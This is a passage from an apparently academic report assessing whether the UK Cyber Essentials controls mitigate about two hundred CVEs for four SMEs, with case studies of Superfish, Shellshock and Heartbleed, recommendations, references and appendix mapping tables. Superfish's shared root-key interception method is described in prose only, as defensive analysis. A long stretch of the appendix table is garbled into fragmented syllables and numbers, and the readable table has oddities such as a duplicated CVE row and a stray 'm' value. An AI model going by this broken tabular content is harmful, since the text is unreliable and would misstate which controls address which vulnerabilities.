"The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products."

CVE-2015-2077 [14]

This vulnerability is particularly interesting because the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the 'normal configuration' of the equipment it remained undetected for a long time, and it hints that there may be further breaches of security, as yet undiscovered, in both Lenovo's and other manufacturers' equipment.

The vector is the Superfish software breaking the chain of trust for SSL certificates: it installs its own self-signed root CA certificate into the host machine's list of trusted certificates, and the matching private key, identical on every installation, ships inside the software. An attacker who extracts that key (easily done from any other machine running Superfish) can sign a certificate for any domain that the target machine will accept as valid, and so gains full access to any SSL-secured connection from the target.

While the risk to users and SMEs was high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and, provided the administrators know to run it, falls within the Cyber Essentials patch management advice. The check that matters afterwards is that the Superfish root certificate is gone from every trust store on the machine (the Windows store and any browser that keeps its own), since uninstalling the application alone leaves the certificate behind.

Threat Analysis

ShellShock: Without Cyber Essentials in place, SME 1 and 2 would be at risk from 'Shellshock', as they both operate Unix/Linux based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their heavy dependence on outside service providers leaves them both unable to determine their exposure and unable to remedy it.

With Cyber Essentials, SME 1 and 2 would be fully protected, and it is likely that SME 3 and 4 are also protected if the external providers also use Cyber Essentials or another security and patching scheme.

Heartbleed: The 'Heartbleed' bug is another vulnerability that, without the Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and the application of access controls from the Cyber Essentials guidelines.

SuperFish: All of the SMEs we interviewed could be exceedingly vulnerable to the 'Superfish' issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require the administrators to be aware of the issue and to know of the fix, rather than simply following 'normal' patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, Cyber Essentials patch management fully mitigates it.

Conclusions

The Cyber Essentials security controls have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two hundred vulnerabilities collected, eight could not be resolved with the deployment of security patches; for vulnerabilities such as these the only mitigation available is simply not to install the affected systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.

Scope: It is important to consider that the scope of this study covers only internet-based, commodity-level attacks, and although the Cyber Essentials controls perform very well in mitigating these, this does not represent full security. There is an increasingly identified risk from insiders that also requires attention: not only malicious acts, but also users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.

Additional Tools

The 10 Steps to Cyber Security [2] identifies additional security measures that complement the Cyber Essentials scheme well, delivering further security through indirect measures such as User Education and Awareness, along with Network and Systems Monitoring. Education and awareness would bolster cyber-security by equipping each employee of the SME with the necessary knowledge of safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and systems monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for larger organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action in attacks more bespoke and sophisticated than those reported on here, but also to provide evidence for any potential cyber-crime investigation.

There are collective approaches to improving cyber-security; a notable example is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on cyber-security issues and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful for quickly identifying potential vulnerabilities and available patches, which, as shown in this report, is critical for the CE patch management control to fully mitigate the related vulnerabilities.

An important note concerns the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should hold their security practice to a high level of scrutiny and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (around 600 SMEs) with Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes: minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.

Cyber Essentials Controls

Of the five current Cyber Essentials controls, patch management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses ranked patch management last in use among SMEs. The controls most used currently are those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewalls. Patch management is not necessarily understood by individuals as a tool that greatly improves cyber-security.

Anti-malware was useful in mitigating the fewest (10%) vulnerabilities. It is, however, important to note that anti-malware is largely the only security tool that routinely scans the network's hardware and software, as well as any items downloaded from the internet or received as email attachments. It serves as a last line of defence and as such is vital to an organisation's cyber-safety.

Recommendations

To further improve cyber-security across the UK we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental or collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attack mentioned above, which were not within the scope of this report.

References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office and Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office and Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters and Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK and Department for Business, Innovation & Skills. Cyber-security Information Sharing Partnership (CiSP). https://www.cert.gov.uk/cisp, March 2013.

[5] CREST. Cyber Essentials certified companies. http://www.cyberessentials.org/list, March 2015.

[6] CVE, Mitre.org. Terminology. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber Essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure and Department for Business, Innovation & Skills. Common cyber attacks: Reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North West cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-‘-cluster, 2015.

[10] HM Government. Cyber Essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 (aka Heartbleed). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 (aka Shellshock). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 (aka Superfish). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy: protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.

Cyb

erC

ontr

ols

App

licab

ility

CV

ES

ME

1S

ME

2S

ME

3S

ME

4Id

ealis

edN

oC

EW

ith

CE

CV

E-2

01

3-0

00

8y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(U

ser

Po

licy)

A

nti

-Mal

war

eC

VE

-20

13

-00

22

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-00

84

yy

yn

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

W

ebsi

teB

lack

listi

ng

CV

E-2

01

3-0

14

0y

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

14

9n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-01

72

yn

nn

nN

ot

Mit

igat

edM

itig

ated

-U

ser

Acc

ess

(Str

on

gP

assw

ord

)P

atch

Man

agem

ent

CV

E-2

01

3-0

17

4n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Acc

ess

Po

licy

(Str

on

gP

assw

ord

)F

irew

all

Pat

chM

anag

emen

tC

VE

-20

13

-01

99

yn

nn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

ampS

ecu

reC

on

fig

ura

tio

nC

VE

-20

13

-02

53

nn

yn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Ser

ver)

CV

E-2

01

3-0

27

0n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

48

1n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

59

8n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

61

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

63

3y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

sin

g)

Fir

mw

are

Man

agem

ent

CV

E-2

01

3-0

64

9y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

sin

g)

Pat

chM

anag

emen

tC

VE

-20

13

-07

46

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-07

53

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-07

87

yy

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

90

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

03

5y

yy

yn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

W

ebsi

teB

lack

listi

ng

CV

E-2

01

3-1

10

2n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-11

40

nn

nn

nN

ot

Mit

igat

edN

ot

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

(Do

nrsquot

inst

all)

CV

E-2

01

3-1

14

4n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

ampF

irew

all

CV

E-2

01

3-1

15

3y

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

3-1

18

1n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-13

03

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-13

84

yy

yy

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

CV

E-2

01

3-1

38

8n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

3-1

45

0y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

3-1

47

2y

yy

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Acc

ess

Po

licy)

CV

E-2

01

3-1

55

3y

ny

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

62

0y

yy

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

ampF

irew

all

CV

E-2

01

3-1

62

7n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

63

8y

yy

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

66

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

67

6y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

70

0y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tA

nti

-Mal

war

eC

VE

-20

13

-17

34

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-17

77

nn

yn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Pat

chM

anag

emen

tC

VE

-20

13

-23

19

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

C

VE

-20

13

-23

40

nn

nn

nN

ot

Mit

igat

edN

ot

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

(Do

nrsquot

inst

all)

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall
CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration - no JS
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | m | Not Mitigated | Mitigated - Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie-deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls include anti-DOS
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, AntiDOS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-Dos, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
